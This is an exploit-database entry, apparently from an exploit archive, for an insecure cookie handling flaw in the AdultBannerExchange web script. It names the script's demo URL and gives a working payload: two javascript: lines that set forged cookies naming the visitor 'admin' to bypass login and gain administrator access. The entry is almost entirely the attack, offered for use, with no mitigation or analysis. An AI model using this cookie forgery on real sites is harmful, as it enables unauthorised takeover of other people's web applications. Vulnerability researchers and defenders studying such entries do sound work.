id: 10821
date: 02/10/2010
title: AdultBannerExchange Insecure Cookie Handling Vulnerability
author: JiKo
cves: 

==========================================================
AdultBannerExchange Insecure Cookie Handling Vulnerability
==========================================================

[~]-----------|01|
    -{Script}
    name :AdultBannerExchange
    link :http://www.ezonescripts.com/productdemos/AdultBannerExchange/account.php?action=account

[~]-----------|02|
    -{3xpl01t}
    javascript:document.cookie="bannerexchangename=admin; path=/";
    javascript:document.cookie="bannerexchangerand=905; path=/";




#  0day.today [2023-03-26]  #